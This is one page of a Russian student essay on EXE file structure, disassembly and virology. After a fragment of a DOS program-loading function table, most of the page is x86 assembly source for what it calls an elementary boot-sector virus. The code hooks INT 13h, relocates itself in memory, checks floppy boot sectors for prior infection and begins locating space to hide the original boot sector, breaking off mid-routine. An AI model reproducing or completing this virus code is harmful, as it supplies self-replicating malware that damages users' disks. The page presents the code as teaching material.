Быстрый поиск

Реферат: Семантический анализ структуры EXE файла и дисассемблер (с примерами и исходниками), вирусология

0 - загрузить и выполнить

1 - загрузить и не выполнять

3 - загрузить оверлей

4 - загрузить и выполнить в фоновом режиме (dos 4.0)

es:bx = блок параметров (таб 3)

ds:dx = имя программы

выход:

if CF=0 then

bx,dx разрушены

else

ax = код ошибки (1,2,5,8,0A,0B)

Пример элементарного BOOT-вируса:

.286

.model tiny

.code

org 00h

start: jmp install

;jmp fkс

table: ; А вот тут будет таблица диска

org 4ch ; много места ей, но...

fkс: nop ;

xor di,di ; обнулим их

mov ds,di ; DS=0

cli ;

mov ss,di ; SS=0

mov si,7c00h ; SI - адрес в памяти, там мы

; начинаемся.

mov bx,si ; запомним это... еще пригодится

mov sp,si

sti

dec word ptr ds:[0413h] ; стока памяти дос

mov ax,ds:[0413h] ; в АХ размер дос-памяти в килобайтах

mov cl,06 ; чтобы получить сегмент надо число

shl ax,cl ; килобайт умножить на 40h

; немного арифметики - сегмент считают

; от начала памяти в параграфах, пара-

; граф=10h байт, 40h параграфов=400h

; байт=1кБт. дальше все ясно.

mov es,ax ; ES=адрес нового сегмента

push ax ; в стек его - будем делать переход

mov ax,offset inst_int ; на это вот смещение

push ax ; и его в стек тоже

mov cx,200h ; но сперва надо перенести свое тело

cld ; в этот вот сегмент

rep movsb ; переносим

retf ; переход через стек

inst_int: ; здесь мы уже в новом сегменте

mov ax,ds:[13h*4] ; INT 0E0h=INT 13h original

mov ds:[0e0h*4],ax ;

mov ax,ds:[13h*4+2] ;

mov ds:[0e0h*4+2],ax ;

mov word ptr ds:[13h*4],offset int13 ; INT 13h=наш обработчик

mov ds:[13h*4+2],cs ;

xor cx,cx

push cx ; снова подготовка к переходу

push bx ; через стек в точку 0000:7C00h

mov es,cx

mov ax,0201h ; читать нормальный бут-сектор

mov cx,cs:floppy_sect ; вот отсюда его и читать

mov dh,cs:floppy_head ;

xor dl,dl ; с диска А: естественно

int 0e0h ; вызов оригинального INT 13h

run_boot:

retf ; запустить бут.

;------ *** Hаш обработчик INT 13h *** -------

int13: mov cs:shit,ax ; сохраним ax

int 0e0h ; выполним операцию

jnc int_continue ; если была ошибка уходим

jmp int_exit

int_continue:

pushf ; флаги запомнить надо!

cmp byte ptr cs:[shit+1],2 ; reading sectors?

jnz g1

cmp cx,0001

jne g1

cmp dh,0 ; читаем бут

jne g1

cmp dl,01 ; не с винта надеюсь?

jna fkс_boot

g1: jmp get_out

;------------- Обработчик чтения бута с дискеты ---------------

fkс_boot:

pusha

push ds es

push es

pop ds

lea di,fkс ; сравним то что у нас по смещению fkс

mov ax,cs:[di] ; с тем что мы прочитали по тому же смещению

mov si,bx ; Так мы проверяем заражен ли

add si,offset fkс ; уже нами бут-сектор

cmp ax,[si] ;

jz exit_boot_work ; если нет то уйдем отсюда

cmp dl,1 ; на всякий пожарный :) В принципе можете

ja exit_boot_work ; эту проверку выкинуть - она уже была

find_place: ; поиск места куда прятать старый бут-сектор

mov ax,[bx+16h] ; ax=число секторов в FAT

mul byte ptr [bx+10h] ; умножим его на число FAT

add ax,[bx+0eh] ; прибавим число резервных секторов для FAT--

push dx ; запомним dx - там номер диска и сторона |

mov cl,4 ; |

mov dx,[bx+11h] ; dx=число элементов корневого каталога |

; 1 элемент занимает 32 байта |

shr dx,cl ; поделим его на 16 - получим число сектров |

; корня, вроде бы так... |

add ax,dx ; прибавим к AX------------------------------

dec ax ; уменьшим на 1

; в AX порядковый номер последнего сектора

; ROOT'a... ???

mov cx,[bx+18h] ; cx=число секторов на дорожке

push cx ; запомним его

Страницы: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17

Новости

Быстрый поиск

Группа вКонтакте: новости

Пока нет

Новости в Twitter и Facebook

Новости

Обратная связь

Поиск

Обратная связь

Реклама и размещение статей на сайте

Меню

Быстрый поиск

Реферат: Семантический анализ структуры EXE файла и дисассемблер (с примерами и исходниками), вирусология

Новости

Быстрый поиск

Группа вКонтакте: новости

Новости в Twitter и Facebook

Новости

Обратная связь